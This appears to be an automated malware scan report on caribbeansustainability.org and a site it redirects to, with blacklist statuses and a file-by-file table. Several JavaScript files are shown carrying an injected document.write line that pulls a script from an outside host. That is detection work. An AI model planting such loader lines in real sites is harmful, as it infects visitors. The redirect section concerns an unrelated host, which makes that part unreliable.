Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caribbeansustainability.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://caribbeansustainability.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: levillageprovencal.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:54:14 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 240planBAK=R2339302148; path=/; expires=Sat, 07-Jun-2014 23:11:19 GMT
Set-Cookie: 240plan=R130310288; path=/; expires=Sat, 07-Jun-2014 23:00:20 GMT
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: levillageprovencal.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:54:14 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 240planBAK=R2339302148; path=/; expires=Sat, 07-Jun-2014 23:11:19 GMT
Set-Cookie: 240plan=R130310288; path=/; expires=Sat, 07-Jun-2014 23:00:20 GMT
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: levillageprovencal.fr
Referer: http://www.google.com/search?q=levillageprovencal.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: levillageprovencal.fr
Referer: http://www.google.com/search?q=levillageprovencal.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://caribbeansustainability.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 14 Jun 2014 15:54:07 GMT Location: http://7-elements.org/home.html Server: Apache Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://7-elements.org/home.html | 200 OK Content-Length: 39079 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: caribbeansustainability.org ...[40270 bytes skipped]... }); }); </script></div> </div> </section> <br clear="all"> <footer class="clearfix"> <div id="inner-wrapper"> <div class="similarbox"> <h1>7e PHOTO GALLERY</h1> <div class="gallerythumbs"> <ul> <li><a href="http://caribbeansustainability.org/photos" title="" ><img width="140" src="http://7-elements.org/uploads/images/thumbnail/images844e279ce5772f9459557c0686c6a68d_DSC_0013.jpg" alt="" border="0"></a></li> <li> <!--<a href="" style="color:#fc0; font-size:11px">CHECK ALL PHOTOS</a>--> </li> </ul> </div> </div> <div class="similarbox"> ...[4862 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js | 200 OK Content-Length: 93100 Content-Type: text/javascript | clean |
http://7-elements.org/scripts/jquery.validate.js | 200 OK Content-Length: 37274 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720691"></script>'); | ||
http://7-elements.org/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 9130 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720573"></script>'); | ||
http://7-elements.org/fancybox/jquery.easing-1.3.pack.js | 200 OK Content-Length: 6859 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720571"></script>'); | ||
http://7-elements.org/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1420 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720574"></script>'); | ||
http://7-elements.org/nivo/scripts/jquery.nivo.slider.pack.js | 200 OK Content-Length: 11692 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720661"></script>'); | ||
http://7-elements.org/scripts/idTabs.js | 200 OK Content-Length: 8949 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720688"></script>'); | ||
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 148877 Content-Type: application/x-javascript | clean |
http://7-elements.org/scripts/coin-slider.js | 200 OK Content-Length: 12111 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.drhrandek.hr/lmfgdcdh.php?id=55720686"></script>'); | ||
http://caribbeansustainability.org/photos | 200 OK Content-Length: 30039 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 7-elements.org var siteName = 'http://7-elements.org/'; var baseImgUrl = 'http://7-elements.org/skin/images/'; var ajaxUrl = 'http://7-elements.org/ajax/'; | ||
http://caribbeansustainability.org/test404page.js | 404 Not Found Content-Length: 28597 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 7-elements.org var siteName = 'http://7-elements.org/'; var baseImgUrl = 'http://7-elements.org/skin/images/'; var ajaxUrl = 'http://7-elements.org/ajax/'; |